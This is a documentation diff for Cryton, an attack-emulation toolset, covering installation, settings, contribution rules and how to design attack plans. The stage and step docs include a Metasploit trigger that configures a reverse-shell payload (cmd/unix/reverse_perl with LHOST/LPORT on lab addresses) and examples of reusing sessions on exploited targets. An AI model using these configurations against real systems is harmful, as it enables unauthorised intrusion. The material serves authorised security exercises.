+ +| value | default | example | +|--------|-----------|-------------| +| string | 127.0.0.1 | rabbit.host | + +#### CRYTON_WORKER_RABBIT_PORT +RabbitMQ server port. + +| value | default | example | +|-------|---------|---------| +| int | 5672 | 15672 | + +#### CRYTON_WORKER_RABBIT_USERNAME +Username for RabbitMQ server login. + +| value | default | example | +|--------|---------|---------| +| string | cryton | admin | + +#### CRYTON_WORKER_RABBIT_PASSWORD +Password for RabbitMQ server login. + +| value | default | example | +|--------|---------|---------| +| string | cryton | mypass | + +#### CRYTON_WORKER_EMPIRE_HOST +Empire server host. + +| value | default | example | +|--------|-----------|-------------| +| string | 127.0.0.1 | empire.host | + +#### CRYTON_WORKER_EMPIRE_PORT +Empire server port. + +| value | default | example | +|-------|---------|---------| +| int | 1337 | 11337 | + +#### CRYTON_WORKER_EMPIRE_USERNAME +Username for Empire server login. + +| value | default | example | +|--------|---------|-------------| +| string | cryton | empireadmin | + +#### CRYTON_WORKER_EMPIRE_PASSWORD +Password for Empire server login. + +| value | default | example | +|--------|---------|-------------| +| string | cryton | password123 | + +#### CRYTON_WORKER_APP_DIRECTORY +Path to the Cryton Worker directory. **(do not change, if you don't know what you're doing)** + +| value | default | example | +|--------|-------------------------|---------------| +| string | ~/.local/cryton-worker/ | /path/to/app/ | + +!!! info "" + + The default value in Docker is set to `/app`. 
+ +## Prerequisites +Cryton Worker requires the following technologies to run properly: + +- [Metasploit Framework](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html){target="_blank"} +- [Empire C2](https://bc-security.gitbook.io/empire-wiki/quickstart/installation){target="_blank"} + +To make the installation process smoother the prerequisites are bundled within the [Docker Compose](#with-docker-compose) installation. + +## Installation + +### With Docker Compose +The easiest way to install Cryton Worker (and its prerequisites) is to use the example Docker Compose configuration. + +!!! danger "Requirements" + + - [Docker Compose](https://docs.docker.com/compose/install/){target="_blank"} + - Install the [modules](modules.md#installation) + - Create [permanent settings](#settings-permanent) + - Update the following settings: + 1. CRYTON_WORKER_MODULES_DIR=/absolute/path/to/modules/ + 2. CRYTON_WORKER_EMPIRE_HOST=cryton-empire + +!!! tip "Recommendations" + + - Docker [Post-installation steps](https://docs.docker.com/engine/install/linux-postinstall/){target="_blank"} + - Override the [settings](#settings) + +First, switch to the app directory: +```shell +cd ~/.local/cryton-worker/ +``` + +Install the [modules](modules.md#installation) into the app directory and export the path: +```shell +export CRYTON_WORKER_MODULES_DIR=~/.local/cryton-worker/modules/ +``` +If you're using persistent settings, make sure that they match. + +Download the configuration using: + +=== "curl" + + ```shell + curl -O https://gitlab.ics.muni.cz/cryton/cryton-worker/-/raw/{{{ git_release }}}/docker-compose.yml + ``` + +=== "wget" + + ```shell + wget https://gitlab.ics.muni.cz/cryton/cryton-worker/-/raw/{{{ git_release }}}/docker-compose.yml + ``` + +Run the Compose configuration: +``` +docker compose up -d +``` + +??? question "What should the output look like?" 
+
+    ```
+    [+] Running 6/6
+    ⠿ Network cryton-worker_default Created
+    ⠿ Container cryton-worker Started
+    ⠿ Container cryton-empire Started
+    ```
+
+Everything should be set. Check if the installation was successful and the Worker is running:
+```shell
+docker compose logs cryton_worker
+```
+You should see `[*] Waiting for messages.` in the output.
+
+### With pipx
+Cryton Worker is available on [PyPI](https://pypi.org/project/cryton-worker/){target="_blank"} and can be installed using *pip*.
+However, we **highly recommend** installing the app in an isolated environment using [pipx](https://pypa.github.io/pipx/){target="_blank"}.
+
+!!! danger "Requirements"
+
+    - [Python](https://www.python.org/about/gettingstarted/){target="_blank"} >={{{ python.min }}},<{{{ python.max }}}
+    - [pipx](https://pypa.github.io/pipx/){target="_blank"}
+
+!!! tip "Recommendations"
+
+    - Override the [settings](#settings)
+    - Enable [shell completion](#shell-completion)
+
+Install the [modules](modules.md#installation) into the app directory and export the path:
+```shell
+export CRYTON_WORKER_MODULES_DIR=~/.local/cryton-worker/modules/
+```
+If you're using persistent settings, make sure that they match.
+
+Install the app:
+
+=== "pipx"
+
+    ```shell
+    pipx install cryton-worker
+    ```
+
+=== "pip"
+
+    ```shell
+    pip install --user cryton-worker
+    ```
+
+### With Docker
+Cryton Worker is available as a Docker image and can be installed using Docker.
+
+!!! danger "Requirements"
+
+    - [Docker](https://docs.docker.com/engine/install/){target="_blank"}
+
+!!! 
tip "Recommendations" + + - Docker [Post-installation steps](https://docs.docker.com/engine/install/linux-postinstall/){target="_blank"} + - Override the [settings](#settings) + - If you're using persistent settings, switch to the [app directory](#cryton_worker_app_directory) and [pass the settings](#settings-docker) + +Install the [modules](modules.md#installation) into the app directory and export the path: +```shell +export CRYTON_WORKER_MODULES_DIR=~/.local/cryton-worker/modules/ +``` +If you're using persistent settings, make sure that they match. + +Run the container: + +[//]: # (TODO: add a guide to mount the tools?) + +=== "bare version" + + The bare image **doesn't** take care of the modules' system requirements. It should be used on a Kali OS. + + The following command ensures effortless deployment. It mounts the modules and shares the host's networking namespace. + ``` + docker run --network host -e CRYTON_WORKER_MODULES_DIR=${CRYTON_WORKER_MODULES_DIR} -v ${CRYTON_WORKER_MODULES_DIR}:${CRYTON_WORKER_MODULES_DIR} registry.gitlab.ics.muni.cz:443/cryton/cryton-worker:{{{ release_version }}} + ``` + + !!! warning "Limitations" + + - The easiest way to make the container accessible from the outside and to allow the container to access the prerequisites is to use the `--network host` option + - Since the image doesn't contain the tools or the Metasploit Framework, you need to set up and mount them on your own + +=== "kali version" + + The kali image takes care of the modules' system requirements and also hosts the Metasploit Framework. However, the drawback is its large size. + + The following command ensures effortless deployment. It mounts the modules and shares the host's networking namespace. + ``` + docker run --network host -e CRYTON_WORKER_MODULES_DIR=${CRYTON_WORKER_MODULES_DIR} -v ${CRYTON_WORKER_MODULES_DIR}:${CRYTON_WORKER_MODULES_DIR} registry.gitlab.ics.muni.cz:443/cryton/cryton-worker:kali-{{{ release_version }}} + ``` + + !!! 
warning "Limitations" + + - The easiest way to make the container accessible from the outside and to allow the container to access the prerequisites is to use the `--network host` option + +## Usage +!!! info "" + + If you're using Docker (Compose) to install the app, you can ignore this section. + +Use the following to invoke the app: +```shell +cryton-worker +``` + +You should see a help page: +``` +Usage: cryton-worker [OPTIONS] COMMAND [ARGS]... + + Cryton Worker CLI. + +Options: + ... +``` + +To learn about each command's options use: +```shell +cryton-worker <your command> --help +``` + +To start Worker use `cryton-worker start` and you should see something like: +``` +Starting Worker worker.. +To exit press CTRL+C +Connection does not exist. Retrying.. +Connection to RabbitMQ server established. +[*] Waiting for messages. +``` + +??? question "Want to run the Worker in the background?" + + Use the `nohup` command: + ```shell + nohup cryton-worker start > /tmp/worker_std_out 2>&1 & + ``` + + To **stop** the Worker, find their processes and kill them: + ```shell + ps -aux | grep cryton-worker + kill <PID> <PID> + ``` + +## Shell completion +Shell completion is available for the *Bash*, *Zsh*, and *Fish* shell and has to be manually enabled. + +!!! info "" + + - To enable the shell completion, the tool must be present + - The shell completion is enabled in Docker by default + +First, make sure the app directory exists: + +=== "Bash" + + ```shell + mkdir -p ~/.local/cryton-worker/ + ``` + +=== "Zsh" + + ```shell + mkdir -p ~/.local/cryton-worker/ + ``` + +Generate, save, and load the completion script: + +=== "Bash" + + ```shell + _CRYTON_WORKER_COMPLETE=bash_source cryton-worker > ~/.local/cryton-worker/cryton-worker-complete.bash + echo ". ~/.local/cryton-worker/cryton-worker-complete.bash" >> ~/.bashrc + ``` + +=== "Zsh" + + ```shell + _CRYTON_WORKER_COMPLETE=zsh_source cryton-worker > ~/.local/cryton-worker/cryton-worker-complete.zsh + echo ". 
~/.local/cryton-worker/cryton-worker-complete.zsh" >> ~/.zshrc
+    ```
+
+=== "Fish"
+
+    ```shell
+    _CRYTON_WORKER_COMPLETE=fish_source cryton-worker > ~/.config/fish/completions/cryton-worker-complete.fish
+    ```
+
+You may need to restart your shell for the changes to take effect. diff --git a/docs/contribution-guide.md b/docs/contribution-guide.md index 7a5e606701107042c982af685f2f4d6f1e8fc3be..b47f559216900a4e1710f3b2ac3f62210c5e16b0 100644 --- a/docs/contribution-guide.md +++ b/docs/contribution-guide.md @@ -1,7 +1,105 @@ ## Fixing and reporting bugs -Any identified bugs should be posted as an issue in the respective [gitlab repository](https://gitlab.ics.muni.cz/cryton). +Any identified bugs should be posted as an issue in the respective [gitlab repository](https://gitlab.com/cryton-toolset){target="_blank"}. Please, include as much detail as possible for the developers, to be able to reproduce the erroneous behavior. -## Writing Attack modules -To make attack scenario automation easier we need to create and maintain attack modules. To support project development -checkout section [How to create Attack module](2022.2/modules/howto-create-attack-modules.md). +!!! warning "" + +    Before you create an issue, make sure it doesn't exist yet. + +!!! warning "" + +    If the issue exists in the [official Gitlab repository](https://gitlab.ics.muni.cz/cryton){target="_blank"}, please mention it in your issue. + +## Contributing code +To support project development check out the development instructions: + +- [Core](development/core.md) +- [Worker](development/worker.md) +- [Modules](development/modules.md) +- [CLI](development/cli.md) +- [Frontend](development/frontend.md) + +## Contribution guidelines + +### Merge requests + +- Every merge request will be named as a summary of changes or as its issue counterpart. For example +`Bugfix "StageExecution won't schedule due to ..."`, `Feature "TicketName"`, `Enhancement "TicketName"`, +`Resolve "MyIssue"`. 
+ +- The merge request's description will contain a list of changes for an easier update of other components or +changelog when creating a new release. If there are some breaking changes, that will render the other components +useless, please describe them in detail, or even better add an example. + +- If the merge request is changing functionality in a way that affects other components, you have to create tickets +(ticket name example: `Update for "MainTicketName"`) for those projects and mark them as blocking for the main MR. +Related merge requests should be merged at the same time (this doesn't apply to the front-end ATM). + +- Before opening a merge request for the Core, Worker, or CLI projects you should run end-to-end tests, which have been +updated for the changes the merge request will do. + +### Tests +This guide simplifies and pinpoints the most important points. + +For in-app testing, we are using unit/integration tests written using the *Pytest* library. + +Unit tests are meant to test a specific method/function in an isolated environment (using mocking) while +the integration tests check if a unit (method/function) can run even without being isolated. End-to-end tests are +testing if all the functionality works across the whole Cryton toolset. + +- Settings for Pytest can be found in a *pyproject.toml* file +- Tests (that test the same code part/class) are grouped using classes +- Each class that works with the Django DB has to be marked with `@pytest.mark.django_db` +- Each class should be patched to use the test logger if possible ([Core](logging.md#core); [worker](logging.md#worker)) +- Unit tests shouldn't interact with the DB. +- Use the `model_bakery` library instead of mocking the DB interactions for the integration tests +- For easier mocking, each test class should have a `path` class variable. If we are testing a class +in `path/to/module.py`, then the *path* variable will be `path = "path.to.module"`. 
To mock we simply use +`mocker.patch(self.path + ".<method_to_mock>")`. +- We are using the *mocker* library instead of the *unittest.mock.Mock*. +- Each test method starts with the `test_` prefix. +- Each fixture method starts with the `f_` prefix. +- When using parametrize, the created parameters must have the `p_` prefix. + +A test should follow the following structure. +```python +import pytest + +class TestUnitName: + path = "path.to.patch.MyClass" + + @pytest.fixture + def f_to_patch(self, mocker): + return mocker.patch(f"{self.path}.to_patch") + + @pytest.mark.parametrize( + "p_to_parametrize", + [ + ] + ) + def test_to_test(self, f_to_patch, p_to_parametrize): + # Arrange - set everything needed for the test + + # Mock - mock everything needed to isolate your test + + # Act - trigger your code unit + + # Assert - assert the outcome is exactly as expected to avoid any unpleasant surprises later + pass +``` + +## Documentation + +### CLI documentation generation +Install Cryton CLI and run `cryton-cli generate-docs doc.md` + +### Core REST API documentation generation + +- Install the [swagger-markdown tool](https://www.npmjs.com/package/swagger-markdown){target="_blank"} +- Download the schema from [http://127.0.0.1:8000/api/schema/](http://127.0.0.1:8000/api/schema/){target="_blank"} +- Run `swagger-markdown -i path/to/swagger-schema.yml`. 
+ +### Useful links + +- [MkDocs Wiki](https://github.com/mkdocs/mkdocs/wiki){target="_blank"} (Third-party themes, recipes, plugins and more) +- [Best-of-MkDocs](https://github.com/pawamoy/best-of-mkdocs){target="_blank"} (Curated list of themes, plugins and more) diff --git a/docs/2022.2/designing-phase/plan-instance.md b/docs/designing-phase/plan-instance.md similarity index 72% rename from docs/2022.2/designing-phase/plan-instance.md rename to docs/designing-phase/plan-instance.md index e816c9b68f048d8a77457dc7a3cabddf6f52833b..d1925449fae30098e23ca501b9b8dd4d6bf5d5f1 100644 --- a/docs/2022.2/designing-phase/plan-instance.md +++ b/docs/designing-phase/plan-instance.md @@ -2,25 +2,26 @@ The second stage is creating a Plan instance. While Template contains unfilled v Plan instance fills these things in by combining the template with an **inventory file**. This file contains all information that needs to be filled in the template. After instantiation, everything is ready to create a **Run**. -**NOTE: After creating the Plan instance only the [Execution variables](step.md#execution-variables) can be left -unfilled and must be explicitly defined as a string.** +!!! warning + + After creating the Plan instance only the [Execution variables](step.md#execution-variables) can be left unfilled and must be explicitly defined as a string. ## Inventory files When you create a template, you don't always have all the information you need for directly executing it. Or you -simply want to make it reusable for other people in their own environment. To provide variability in +simply want to make it reusable for other people in their environment. To provide variability in templates we support **inventory files**. These inventory files can be used to provide variable values to templates using **Jinja** language. A valid Plan file is written in YAML format with variables in the Jinja format, which have to be replaced during the instantiation process. 
-Example of inventory file: +Inventory file example: ```yaml names: stage1_target: 192.168.56.102 ``` -You can use it as in following example: +Template example: ```yaml # Stage two: target is web server - target: {{names.stage1_target}} diff --git a/docs/2022.2/designing-phase/plan.md b/docs/designing-phase/plan.md similarity index 74% rename from docs/2022.2/designing-phase/plan.md rename to docs/designing-phase/plan.md index c36636752fbe47633ea23872fb9301e6cae677e3..1b6a8322d903734fe94ec08b61179b83d1ee0a79 100644 --- a/docs/2022.2/designing-phase/plan.md +++ b/docs/designing-phase/plan.md @@ -7,6 +7,8 @@ Example of defining a Plan using YAML: plan: name: my-plan owner: my name + settings: + separator: "|" stages: ... @@ -17,3 +19,4 @@ To better understand what each argument means and defines, here is a short descr - **name** - Sets the name of the Plan. - **owner** - Name of the person who created the Plan. - **stages** - List of [Stages](stage.md) that will be executed during the Plan's execution. +- **settings** - Parameters for customization of specific functionalities (only `separator` for now, more about `separator` [here](step.md#custom-separator)) diff --git a/docs/2022.2/designing-phase/stage.md b/docs/designing-phase/stage.md similarity index 79% rename from docs/2022.2/designing-phase/stage.md rename to docs/designing-phase/stage.md index 522d7e067059183db150e9fd6130d004d65da2a4..d9e6fea3258aa9aa6dbe8ed65daec29b3f4dd3df 100644 --- a/docs/2022.2/designing-phase/stage.md +++ b/docs/designing-phase/stage.md @@ -46,15 +46,15 @@ Schedule execution for a specific date and time after the plan started. **Notice:** One argument from the Date and Time part of arguments (every argument except `timezone`) is required. Besides that, arguments are optional and their default values are used in their absence. 
-| Argument | Description | Default | -|----------|----------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------| -| timezone | Timezone for DateTime trigger. List of available timezones [here](https://en.wikipedia.org/wiki/List_of_tz_database_time_zones). | UTC | -| year | Year in which stage should be executed. | The year of the plan execution in the specified timezone | -| month | Month in which stage should be executed. | The month of the plan execution in the specified timezone | -| day | Day in which stage should be executed. | The day of the plan execution in the specified timezone | -| hour | Hour in which stage should be executed. | 00 | -| minute | Minute in which stage should be executed. | 00 | -| second | Second in which stage should be executed. | 00 | +| Argument | Description | Default | +|----------|---------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------| +| timezone | Timezone for DateTime trigger. List of available timezones [here](https://en.wikipedia.org/wiki/List_of_tz_database_time_zones){target="_blank"}. | UTC | +| year | Year in which stage should be executed. | The year of the plan execution in the specified timezone | +| month | Month in which stage should be executed. | The month of the plan execution in the specified timezone | +| day | Day in which stage should be executed. | The day of the plan execution in the specified timezone | +| hour | Hour in which stage should be executed. | 00 | +| minute | Minute in which stage should be executed. | 00 | +| second | Second in which stage should be executed. | 00 | #### Examples @@ -86,7 +86,7 @@ trigger_type: HTTPListener trigger_args: host: localhost # Address of the listener from the Worker's perspective. 
port: 8082 # Port of the listener from the Worker's perspective. - routes: # List of routes listener will check for requests. + routes: # List of routes the listener will check for requests. - path: /index # Request's path. method: GET # Request's allowed method. parameters: # Request's required parameters. @@ -98,11 +98,11 @@ trigger_args: The stage will be executed when a session with the user-defined arguments is returned from Worker. Once the session is saved, it can be accessed using `use_named_session: my-stage-name_session`, where `my-stage-name` is the Stage's name. -Identifiers are arguments that can be used to identify a msf session that we are waiting for to trigger the Stage. Arguments in identifiers use partial 'regex' to get matches. For example, they can use 'handler' to match 'exploit/multi/handler'. +Identifiers are arguments that can be used to identify an MSF session that we are waiting for to trigger the Stage. Arguments in identifiers use partial 'regex' to get matches. For example, they can use 'handler' to match 'exploit/multi/handler'. ```yaml trigger_type: MSFListener trigger_args: - identifiers: # Optional, by default MsfTrigger will try to find a match using 'via_exploit' and 'via_payload' based on used msf module and payload + identifiers: # Optional, by default MsfTrigger will try to find a match using 'via_exploit' and 'via_payload' based on the used MSF module and payload type: 'shell' tunnel_local: '192.168.56.50:4444' tunnel_peer: '192.168.56.51:35380' @@ -124,7 +124,7 @@ trigger_args: RHOST: 192.168.56.51 RPORT: 6697 payload: cmd/unix/reverse_perl # Payload to use. - payload_arguments: # Arguments that will be passed to payload. + payload_arguments: # Arguments that will be passed to the payload. LHOST: 192.168.56.50 LPORT: 4444 @@ -133,7 +133,7 @@ trigger_args: [//]: # (add auxiliary example after Trigger rework) ## Dependencies -Creating time based triggers can be limiting, since the Stage itself can take more time than expected. 
To ensure that +Creating time-based triggers can be limiting, since the Stage itself can take more time than expected. To ensure that the Stages will execute in the correct order, you can choose to check if some other Stage has already finished, before its execution. All you have to do is define the `depends_on` argument. diff --git a/docs/2022.2/designing-phase/step.md b/docs/designing-phase/step.md similarity index 68% rename from docs/2022.2/designing-phase/step.md rename to docs/designing-phase/step.md index 34acc91637b838391843228f4c965f209ead682e..87c9b9cac2fd837863ef3fca34deea2e9254c8a9 100644 --- a/docs/2022.2/designing-phase/step.md +++ b/docs/designing-phase/step.md @@ -1,5 +1,5 @@ As the name suggests, a Step is equal to one action. All the possible actions will be described later. -Every step can have a successor(s) which execution will follow according to provided conditions. +Every step can have a successor(s) whose execution will follow according to provided conditions. Example of defining Step using YAML: ```yaml @@ -21,7 +21,7 @@ next: ``` To better understand what each argument means and defines, here is a short description (sub-arguments are omitted -since they will be discussed in more depth in their own section): +since they will be discussed in more depth in their section): - **name** - Sets the name of the Step, which is mainly used to define its purpose (**must be unique** across the Plan). - **step_type** - Sets what action will the Step perform and what `arguments` will the Step use, more info [below](#step-types). @@ -53,7 +53,7 @@ This functionality uses `step_type: worker/execute` and enables the execution of | `module_arguments` | Python dictionary (JSON) containing arguments that will be passed to the module. | | `create_named_session`<br>(optional) | How to name the session this module will create for later usage. | | `use_named_session`<br>(optional) | Name of created msf session through Cryton. 
| -| `use_any_session_to_target`<br>(optional) | Ip address of target on which has been created msf session. | +| `use_any_session_to_target`<br>(optional) | Ip address of target on which has been created MSF session. | | `session_id`<br>(optional) | ID of msf session to target. | | [`ssh_connection`](#arguments-for-ssh_connection)<br>(optional) | Arguments for creating ssh connection to target. | @@ -71,28 +71,23 @@ This functionality uses `step_type: worker/execute` and enables the execution of ## Conditional execution To be able to execute an attack scenario according to some execution tree, Steps provide a way to be executed -according to specified conditions. There are many types of conditions that can be used. To use them in designing a -Template, a list of dictionaries **containing** params **type**, **value**, **step** must be provided. +according to specified conditions. Multiple types of conditions can be used. To use them in designing a +Template, a list of dictionaries **containing** params **type**, **value**, and **step** must be provided. -Following are types of conditions together with descriptions of possible values. +| parameter | Description | +|-----------|--------------------------------------------------------------------------------------------------------------------------------| +| **type** | Defines which value you want to compare, according to the output of the parent Step. | +| **value** | Defines the desired value of the selected type. Can be defined as a string (one value) or a list of strings (multiple values). | +| **step** | Defines the name(s) of the Step's successor(s). Can be a string (one successor) or a list of strings (multiple successors). | -| Type | Value | Description | -|---------------------|---------------------------------------------------------|------------------------------------------------------------| -| `result` | OK, FAIL, EXCEPTION | Match final `result` of the Step. 
| -| `serialized_output` | Regex expression, for example: `^my_regex_expression.*` | Match regex expression in `serialized_output` of the Step. | -| `output` | Regex expression, for example: `^my_regex_expression.*` | Match regex expression in `output` of the Step. | -| `any` | - (value must be omitted) | Run successor(s) in any case. | +The following are types of conditions together with descriptions of possible values. - -### type -Which value you want to compare, according to the output of the parent Step. - -### value -The desired value of the selected type. Can be defined as a string (one value) or a list of strings (multiple values). - -### step -Name of the Step's successor(s). -Can be a string (one successor) or a list of strings (multiple successors). +| Type | Value | Description | +|---------------------|------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------| +| `result` | OK, FAIL, EXCEPTION | Match final `result` of the Step. | +| `serialized_output` | Regular expression, for example: `^my_regex.*` | Match [regex](https://docs.python.org/3/library/re.html#regular-expression-syntax){target="_blank"} in `serialized_output` of the Step. | +| `output` | Regular expression, for example: `^my_regex.*` | Match [regex](https://docs.python.org/3/library/re.html#regular-expression-syntax){target="_blank"} in `output` of the Step. | +| `any` | Value must be omitted | Run successor(s) in any case. | ### Examples: ```yaml @@ -119,11 +114,41 @@ next: - step-to-execute-2 ``` +## Session management +One of the unique features of Cryton is the ability to create and use *sessions* - connections to the target systems. +When you successfully exploit a running network service on your target machine (victim), you open a connection to it. 
+In Cryton, this connection can be given a name and then used during the Plan execution in any Step (which is executed +on the same Worker node and supports this functionality). Metasploit Framework session management is used for storing +and interacting with sessions, and therefore must be available and running on the Worker node. + +```yaml +- name: step1 + arguments: + create_named_session: session_to_target_1 + ... +- name: step2 + arguments: + use_named_session: session_to_target_1 + ... +``` + +In the example above, the step1 creates a named session *session_to_target_1* (in case it succeeds). +Its Metasploit ID gets stored in the database and can be used anywhere in the Plan, not only in the following Step +(as seen in the example). When the Plan creates multiple sessions to the same target, and the attacker does not care which +he is using, the *use_any_session_to_target* parameter can be used. + +```yaml +- name: step1 + arguments: + use_any_session_to_target: 192.168.56.22 + ... +``` + ## Output sharing Output sharing is used for sharing gained data (*serialized_output*) between multiple steps. To go through the data we use a modified version of a dot notation. -For example imagine following dictionary (Python data structure) +For example, imagine the following dictionary (Python data structure) ```json {"credentials": [{"username": "admin", "password": "securePassword"}]} ``` @@ -132,12 +157,12 @@ If we wanted to access it and get **password** for *admin* user using our versio This brings in some limitations: -- keys are separated using `.` +- keys are separated using `.` (More on how to choose a custom separator [here](#custom-separator). 
- key can't be in format `[integer]` (regex representation: `^\[[0-9]+]$`) as it represents list (array) index -- list (array) index can be defined multiple times in the same key for example `myKey[1][1]`, however must be defined at its end +- list (array) index can be defined multiple times in the same key for example `myKey[1][1]` (it must be defined at its end) (regex representation: `((\[[0-9]+])+$)`) -There are two techniques for sharing outputs of modules between steps: +There are two techniques for sharing the outputs of modules between steps: * **output_prefix** * **output_mapping** @@ -174,7 +199,7 @@ For example: username: $custom_prefix.username password: $custom_prefix.password ``` -Also, there is a special prefix named **parent**, which simply takes the output from parent step execution +Also, there is a special prefix named **parent**, which simply takes the output from the parent step execution (which executed the current step). ```yaml @@ -186,18 +211,48 @@ Also, there is a special prefix named **parent**, which simply takes the output step: stepB - name: stepB ... - module_arguments: - username: $parent.var + arguments: + module_name: mod_a + module_arguments: + username: $parent.var ``` -Output prefix **cannot be the name of other steps or the value "parent"**, otherwise it can be +Output prefix **cannot be the name of other steps or the value "parent"**, otherwise, it can be any string **that doesn't contain "$" and "." signs**. +### Custom separator +If for some reason(for example when a key in the module's output is an IPv4 address) you don't want to use `.` as a separator in output-sharing variables, you can use the `settings` parameter in the Plan parameters with a `separator` key for defining custom separator. + +Example of a custom separator used on **parent prefix** example above: +```yaml +plan: + name: my-plan + owner: my name + settings: + separator: "|" + stages: + - name: my-stage + ... + steps: + - name: stepA + ... 
+ next: + - type: ... + value: ... + step: stepB + - name: stepB + ... + arguments: + module: mod_a + module_arguments: + username: $parent|arg +``` + ### Output mapping Sometimes you do not care from which module you receive information. Step A and Step B can both return a stolen authentication token. For this reason, you can use ```output_prefix```. But there is an obvious problem! What if both steps return this value under a different name, e.g. ```token``` and ```auth_token```? Prefix would not help you much in this situation. -For this reason there is a ```output_mapping``` mechanism. +For this reason, there is a ```output_mapping``` mechanism. ```yaml - name: step_a # Returns 'token' @@ -272,4 +327,4 @@ For `empire/agent-deploy` or `empire/execute` you can use these variables for th * If you want to use more Jinja goodies, use the raw block: ```yaml foo: {% raw %} '{{ variable + 14 }}' {% endraw %} - ``` \ No newline at end of file + ``` diff --git a/docs/designing-phase/template.md b/docs/designing-phase/template.md new file mode 100644 index 0000000000000000000000000000000000000000..38893591467a2ee4857c196be8f1deac29aa3448 --- /dev/null +++ b/docs/designing-phase/template.md @@ -0,0 +1,37 @@ +## What is the attack scenario +Let's start with the description of the attack scenario. Scenario and Plan can be used interchangeably - [Plan](plan.md) is just +the name of the element in the formal description of the attack scenario. + +An attack scenario is a sequence of steps with some common objective. This objective may be data ex-filtration, access to +target systems, denial of service, or any other harmful action. For some exercises, every attack should be +divisible into different [stages](stage.md). Imagine you have to attack infrastructure with multiple machines - each machine can +be a separate stage. Or you want to attack according to some kill-chain, e.g. 
the first stage would be scanning of the +infrastructure, the second is brute force attack on credentials to found systems, etc. + +The last and most important element of the Plan description is the [step](step.md). This is the execution of an attack script or tool +against the target. A step can be running a Metasploit exploit, or running a Nmap scan. Steps are dependent on each other, +and so they create an execution tree, where each of them has set the list of successors based on some condition. The +condition may be a success or a string value returned by its predecessor. + +Putting this all together you get the whole attack scenario (called **[Plan](plan.md)**), which is divided into different stages +(called **[Stage](stage.md)**). Every stage is set to run at a specific time, as this is often required by the exercise. And finally, each +stage consists of attack steps (called **[Step](step.md)**), which are organized in a non-binary tree described above. + +## What is the plan template +The first step in designing a Plan (attack scenario) is creating a plan template. A template is basically a Plan object written in YAML. + + + +The template itself is not a fully described attack scenario. The structure of the Attack (execution tree) is correct, +but there are still unfilled places (e.g. IP addresses of targets or other [inventory variables](plan-instance.md#inventory-files)). +This way a template can be designed before knowing these details and used in multiple different environments. + +An abstract Plan can look like this: +```yaml +Plan + Stage 1 + Step 1 + Step 2 + Stage 2 + Step 3 +``` diff --git a/docs/development/cli.md b/docs/development/cli.md new file mode 100644 index 0000000000000000000000000000000000000000..9e5be7168560906c4c6a5413dd465be1aaf60d5f --- /dev/null +++ b/docs/development/cli.md @@ -0,0 +1,71 @@ +## Settings +The best thing you can do is to change the app directory to `path/to/cryton-cli/`. 
That way, you can edit the default .env file +and use it for the compose files. +```shell +export CRYTON_CLI_APP_DIRECTORY=path/to/cryton-cli/ +``` + +[Link to the settings](../components/cli.md#settings). + +## Installation + +!!! danger "Requirements" + + - [Python](https://www.python.org/about/gettingstarted/){target="_blank"} >={{{ python.min }}},<{{{ python.max }}} + - [Poetry](https://python-poetry.org/docs/#installation){target="_blank"} + +!!! tip "Recommendations" + + - Override the [settings](#settings) + +Clone the repository: +```shell +git clone https://gitlab.ics.muni.cz/cryton/cryton-cli.git +``` + +Then go to the correct directory and install the project: +```shell +cd cryton-cli +poetry install +``` + +To spawn a shell use: +```shell +poetry shell +``` + +## Usage +```shell +cryton-cli +``` + +[Link to the usage](../components/cli.md#usage). + + +## Testing + +### Pytest +``` +pytest --cov=cryton_cli tests/unit_tests --cov-config=.coveragerc-unit --cov-report html +``` + +``` +pytest --cov=cryton_cli tests/integration_tests --cov-config=.coveragerc-integration --cov-report html +``` + +???+ "Run specific test" + + ``` + my_test_file.py::MyTestClass::my_test + ``` + +### tox +Use in combination with [pyenv](https://github.com/pyenv/pyenv){target="_blank"}. + +```shell +tox -- tests/unit_tests/ --cov=cryton_cli --cov-config=.coveragerc-unit +``` + +```shell +tox -- tests/integration_tests/ --cov=cryton_cli --cov-config=.coveragerc-integration +``` diff --git a/docs/development/core.md b/docs/development/core.md new file mode 100644 index 0000000000000000000000000000000000000000..2e1401bbcbb33f89a5ec39e85b2e988650dad2ba --- /dev/null +++ b/docs/development/core.md @@ -0,0 +1,107 @@ +## Settings +The best thing you can do is to change the app directory to `path/to/cryton-core/`. That way, you can edit the default .env file +and use it for the compose files. 
+```shell +export CRYTON_CORE_APP_DIRECTORY=path/to/cryton-core/ +``` + +[Link to the settings](../components/core.md#settings). + +## Installation + +!!! danger "Requirements" + + - [Python](https://www.python.org/about/gettingstarted/){target="_blank"} >={{{ python.min }}},<{{{ python.max }}} + - [Poetry](https://python-poetry.org/docs/#installation){target="_blank"} + +!!! tip "Recommendations" + + - Override the [settings](#settings) + +Clone the repository: +```shell +git clone https://gitlab.ics.muni.cz/cryton/cryton-core.git +``` + +Start the prerequisites: +```shell +docker compose -f docker-compose.prerequisites.yml up -d +``` + +??? tip "Clean up and rebuild the prerequisites" + + !!! warning + + The following script removes unused images and volumes. Make sure you know what you're doing! + + ``` + docker compose -f docker-compose.prerequisites.yml down -t 0 && docker system prune --volumes -f && docker compose -f docker-compose.prerequisites.yml up -d + ``` + +Then go to the correct directory and install the project: +```shell +cd cryton-core +poetry install +``` + +To spawn a shell use: +```shell +poetry shell +``` + +## Usage +```shell +cryton-core start +``` + +[Link to the usage](../components/core.md#usage). + +## Testing + +### Pytest +``` +pytest --cov=cryton_core tests/unit_tests --cov-config=.coveragerc-unit --cov-report html +``` + +``` +pytest --cov=cryton_core tests/integration_tests --cov-config=.coveragerc-integration --cov-report html +``` + +???+ "Run specific test" + + ``` + my_test_file.py::MyTestClass::my_test + ``` + +### tox +Use in combination with [pyenv](https://github.com/pyenv/pyenv){target="_blank"}. 
